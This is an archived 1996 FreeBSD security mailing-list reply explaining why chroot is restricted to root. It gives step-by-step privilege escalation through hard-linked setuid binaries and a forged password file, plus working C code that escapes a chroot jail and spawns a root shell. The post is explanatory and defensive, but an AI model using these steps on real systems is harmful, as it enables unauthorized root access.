From avalon@coombs.anu.edu.au Tue Sep 10 09:00:19 1996 Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id IAA07071 for ; Tue, 10 Sep 1996 08:59:37 +1000 Message-Id: <199609092259.IAA07071@suburbia.net> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA022799965; Tue, 10 Sep 1996 08:59:25 +1000 Date: Tue, 10 Sep 1996 08:59:25 +1000 From: Darren Reed Apparently-To: best-of-security@suburbia.net From owner-freebsd-security@freefall.freebsd.org Tue Sep 10 08:05:21 EST 1996 remote from cheops Received: from x.physics.usyd.edu.au by postbox.anu.edu.au with ESMTP (1.37.109.16/16.2) id AA100616720; Tue, 10 Sep 1996 08:05:20 +1000 Return-Path: Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.18]) by x.physics.usyd.edu.au (8.6.8/8.6.5) with ESMTP id IAA24689; Tue, 10 Sep 1996 08:03:46 +1000 Received: from localhost (daemon@localhost) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA20531; Mon, 9 Sep 1996 14:28:02 -0700 (PDT) Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA19351 for security-outgoing; Mon, 9 Sep 1996 14:09:18 -0700 (PDT) Received: from freebsd.gaffaneys.com (dialup6.gaffaneys.com [134.129.252.25]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA19344 for ; Mon, 9 Sep 1996 14:09:11 -0700 (PDT) Received: (from zach@localhost) by freebsd.gaffaneys.com (8.7.5/8.7.3) id QAA04873; Mon, 9 Sep 1996 16:09:47 -0500 (CDT) Message-Id: <199609092109.QAA04873@freebsd.gaffaneys.com> Subject: Re: Question about chroot In-Reply-To: from Richard Wackerbarth at "Sep 9, 96 01:26:21 pm" To: rkw@dataplex.net (Richard Wackerbarth) Date: Mon, 9 Sep 1996 16:09:46 -0500 (CDT) From: Zach Heilig Cc: freebsd-security@FreeBSD.org Reply-To: Zach Heilig X-Mailer: ELM [version 2.4ME+ PL24 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: avalon X-Loop: FreeBSD.org Precedence: bulk In a previous message, Richard Wackerbarth wrote: >In looking at some of the "make" problems, I ran up against a >characteristic of "chroot" that puzzles me. >In order to chroot, you must be root. Why? Basically, all you have to do to become root in a chroot() environment is to hard-link the appropriate setuid executables into a publicly writable directory (usually /usr/tmp), and build your own minimal filesystem to use while in that environment. You need the /etc/master.passwd file (you create it yourself), /etc/group (to put yourself in the wheel group), /usr/sbin/vipw (to rebuild the other passwd files), /usr/bin/su (to gain root), /bin/sh, and any other file utilities that you find you need in the course of the attack (probably hard links to each of the lib*.so.* libraries, and ld/ldd). You should probably put the binaries in /bin (relative to the chroot() root directory). Breaking out of the chroot() environment after you become root is trivial. I have source here that works for FreeBSD: #include #include int main(void) { int i; mkdir("break-out", 0755); chroot("./break-out"); chdir("."); for (i = 0; i < 30; ++i) chdir(".."); chroot("."); execl("/bin/sh", "sh" , (char *) 0); puts("exec failed!"); return 1; } You compile this before calling chroot for /usr/tmp/wherever. At this point, the attacker would clean up his mess in /usr/tmp, and possibly put a setuid shell in an accessible spot. >It appears to me than the only thing that chroot does is to restrict the >"visable" tree. It does not ADD anything that is not already there. But the user can BEFORE running chroot. >If that is the case, why wouldn't it be good enough for chroot to be suid >root and allow any user to execute it? >Am I overlooking some security hole? Yes. This is one reason it is bad to have a world-writable directory on the same filesystem as the /usr filesystem. -- Zach Heilig (zach@blizzard.gaffaneys.com) | ALL unsolicited commercial email Support bacteria -- it's the | is unwelcome. I avoid dealing only culture some people have! | with companies that email ads.